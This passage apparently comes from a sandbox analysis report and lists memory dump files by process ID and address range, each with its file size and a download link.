memory/2152-112-0x0000000001250000-0x00000000012D0000-memory.dmp

Filesize
512KB

Download
memory/2152-117-0x000007FEED690000-0x000007FEEE02D000-memory.dmp

Filesize
9.6MB

Download
memory/2152-113-0x0000000001250000-0x00000000012D0000-memory.dmp

Filesize
512KB

Download
memory/2152-111-0x0000000001250000-0x00000000012D0000-memory.dmp

Filesize
512KB

Download
memory/2432-53-0x0000000002470000-0x00000000024F0000-memory.dmp

Filesize
512KB

Download
memory/2432-48-0x0000000002470000-0x00000000024F0000-memory.dmp

Filesize
512KB

Download
memory/2432-49-0x000007FEED690000-0x000007FEEE02D000-memory.dmp

Filesize
9.6MB

Download
memory/2432-47-0x000007FEED690000-0x000007FEEE02D000-memory.dmp

Filesize
9.6MB

Download
memory/2432-51-0x0000000002470000-0x00000000024F0000-memory.dmp

Filesize
512KB

Download
memory/2432-54-0x000007FEED690000-0x000007FEEE02D000-memory.dmp

Filesize
9.6MB

Download
memory/2440-25-0x0000000002080000-0x0000000002100000-memory.dmp

Filesize
512KB

Download
memory/2624-82-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2624-14-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2624-11-0x000000001B200000-0x000000001B4E2000-memory.dmp

Filesize
2.9MB

Download
memory/2624-12-0x0000000002490000-0x0000000002498000-memory.dmp

Filesize
32KB

Download
memory/2624-13-0x000007FEED690000-0x000007FEEE02D000-memory.dmp

Filesize
9.6MB

Download
memory/2624-15-0x000007FEED690000-0x000007FEEE02D000-memory.dmp

Filesize
9.6MB

Download
memory/2624-16-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2624-38-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2624-64-0x000007FEED690000-0x000007FEEE02D000-memory.dmp

Filesize
9.6MB

Download
memory/2624-67-0x000007FEED690000-0x000007FEEE02D000-memory.dmp

Filesize
9.6MB

Download
memory/2624-17-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2624-85-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2624-76-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2624-34-0x000000001B140000-0x000000001B148000-memory.dmp

Filesize
32KB

Download
memory/2624-40-0x000000001B670000-0x000000001B6A2000-memory.dmp

Filesize
200KB

Download
memory/2624-39-0x000000001B670000-0x000000001B6A2000-memory.dmp

Filesize
200KB

Download
memory/2624-75-0x00000000027F0000-0x0000000002870000-memory.dmp

Filesize
512KB

Download
memory/2744-61-0x0000000002B30000-0x0000000002BB0000-memory.dmp

Filesize
512KB

Download
memory/2744-63-0x0000000002B30000-0x0000000002BB0000-memory.dmp

Filesize
512KB

Download
memory/2744-60-0x000007FEED690000-0x000007FEEE02D000-memory.dmp

Filesize
9.6MB

Download
memory/2744-66-0x0000000002B3C000-0x0000000002BA3000-memory.dmp

Filesize
412KB

Download
memory/2744-65-0x0000000002B30000-0x0000000002BB0000-memory.dmp

Filesize
512KB

Download
memory/2744-68-0x000007FEED690000-0x000007FEEE02D000-memory.dmp

Filesize
9.6MB

Download
memory/2744-62-0x000007FEED690000-0x000007FEEE02D000-memory.dmp

Filesize
9.6MB

Download
memory/2956-24-0x000007FEF5350000-0x000007FEF5D3C000-memory.dmp

Filesize
9.9MB

Download
memory/2956-46-0x00000000415F0000-0x0000000041670000-memory.dmp

Filesize
512KB

Download
memory/2956-50-0x00000000415F0000-0x0000000041670000-memory.dmp

Filesize
512KB

Download
memory/2956-52-0x00000000415F0000-0x0000000041670000-memory.dmp

Filesize
512KB

Download
memory/2956-0-0x000007FEF5350000-0x000007FEF5D3C000-memory.dmp

Filesize
9.9MB

Download
memory/2956-4-0x00000000415F0000-0x0000000041670000-memory.dmp

Filesize
512KB

Download
memory/2956-3-0x00000000415F0000-0x0000000041670000-memory.dmp

Filesize
512KB

Download
memory/2956-2-0x0000000041A90000-0x0000000041EB6000-memory.dmp

Filesize
4.1MB

Download
memory/2956-1-0x00000000415F0000-0x0000000041670000-memory.dmp

Filesize
512KB

Download